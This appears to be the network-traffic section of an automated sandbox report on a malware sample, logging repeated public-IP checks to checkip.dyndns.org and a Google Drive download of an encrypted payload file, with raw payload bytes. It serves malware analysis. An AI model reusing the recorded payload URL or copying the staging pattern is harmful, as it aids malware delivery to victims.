                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            30192.168.2.550039132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:54:25.645160913 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:54:26.336905956 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:54:26 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            31192.168.2.550041132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:54:27.286241055 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:54:27.987797022 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:54:27 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            32192.168.2.550043132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:54:28.976141930 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:54:29.652610064 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:54:29 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            33192.168.2.550045132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:54:30.729417086 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:54:31.428575039 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:54:31 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            34192.168.2.550047132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:54:32.690221071 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:54:33.393652916 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:54:33 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            35192.168.2.550049132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:54:34.443214893 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:54:35.128767967 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:54:35 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            36192.168.2.550051132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:54:36.131848097 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:54:36.847985983 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:54:36 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            37192.168.2.550053132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:54:37.987035036 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:54:38.671724081 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:54:38 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            38192.168.2.550055132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:54:39.585087061 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:54:40.275865078 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:54:40 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            39192.168.2.550057132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:54:41.376315117 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:54:42.094899893 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:54:41 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            40192.168.2.550059132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:54:43.165463924 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:54:43.851001978 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:54:43 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            41192.168.2.550061132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:54:44.909847975 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:54:45.616283894 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:54:45 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            42192.168.2.550063132.226.247.73802672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:54:46.739422083 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:54:47.417826891 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:54:47 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                            43192.168.2.550065132.226.247.7380
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:54:50.549308062 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:54:51.247606993 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:54:51 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.549827142.250.181.2384432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:53:22 UTC216OUTGET /uc?export=download&id=1tBsrC4u2iD4Tc-3CQ1gHCfISO7xUM42y HTTP/1.1
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                            Host: drive.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            2025-01-10 20:53:22 UTC1920INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 10 Jan 2025 20:53:22 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=1tBsrC4u2iD4Tc-3CQ1gHCfISO7xUM42y&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Security-Policy: script-src 'nonce-Zuek_Fw6fQV2N59CGdezrw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.549835172.217.18.974432672C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:53:23 UTC258OUTGET /download?id=1tBsrC4u2iD4Tc-3CQ1gHCfISO7xUM42y&export=download HTTP/1.1
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:53:26 UTC4940INHTTP/1.1 200 OK
                                                                                                            X-GUploader-UploadID: AFiumC6bEjd3JBumUwENSNekZQKEL677JQlsXYigPghN5gdMT9jJwMAxpQ6Ns8IC9lNkfHnLaOuqXK0
                                                                                                            Content-Type: application/octet-stream
                                                                                                            Content-Security-Policy: sandbox
                                                                                                            Content-Security-Policy: default-src 'none'
                                                                                                            Content-Security-Policy: frame-ancestors 'none'
                                                                                                            X-Content-Security-Policy: sandbox
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                                                            Cross-Origin-Resource-Policy: same-site
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Content-Disposition: attachment; filename="OYNyGdSoiO100.bin"
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Credentials: false
                                                                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                            Accept-Ranges: bytes
                                                                                                            Content-Length: 94272
                                                                                                            Last-Modified: Tue, 10 Dec 2024 23:21:23 GMT
                                                                                                            Date: Fri, 10 Jan 2025 20:53:26 GMT
                                                                                                            Expires: Fri, 10 Jan 2025 20:53:26 GMT
                                                                                                            Cache-Control: private, max-age=0
                                                                                                            X-Goog-Hash: crc32c=36f2NQ==
                                                                                                            Server: UploadServer
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close
                                                                                                            2025-01-10 20:53:26 UTC4940INData Raw: 75 86 a6 eb 0b 7d 8f eb 4a 75 e2 f0 69 74 cd 18 92 b5 d3 54 1c 27 9a 70 38 3a 32 ce 9e 82 c3 46 fb 62 04 17 7c 83 72 6e 94 a8 cb 9d 57 4c 7f 82 25 37 b7 96 92 7d de f9 6f 8e 3f 58 78 32 47 fc 85 90 b5 b7 4f b7 09 b0 eb 06 53 58 a0 e6 22 1c 0f 44 79 ce dc aa 1f 13 97 11 25 38 59 d9 9e 37 9a fa 28 00 58 ce 13 76 b7 30 24 4c d9 f9 ac 10 34 23 98 57 03 83 e1 7a 2d 80 1e dc 95 8c cf e9 8e fd 65 7e 22 65 c0 6b 1f 85 0e 7f a3 e1 16 17 02 9e 0f 57 4b 05 af e9 72 10 81 4c 8b 02 8e a3 f4 36 bf 2d a2 ec 23 c7 53 d4 a3 60 fc c4 d4 5e f7 24 5d 52 ee bc d3 21 21 3c 48 d5 68 0a 1e 16 ff 91 35 d9 b0 64 3a bb 0d c7 6a 3f 35 49 11 3d 3b 33 a4 0f 72 e6 0b 68 05 78 c3 0a 7f a2 1b 2c d8 7a 3a 99 b3 81 1d 28 24 88 26 b4 f1 23 14 51 04 44 ed a7 ac 19 f5 f9 71 61 35 69 ea 3b 46
                                                                                                            Data Ascii: u}JuitT'p8:2Fb|rnWL%7}o?Xx2GOSX"Dy%8Y7(Xv0$L4#Wz-e~"ekWKrL6-#S`^$]R!!<Hh5d:j?5I=;3rhx,z:($&#QDqa5i;F
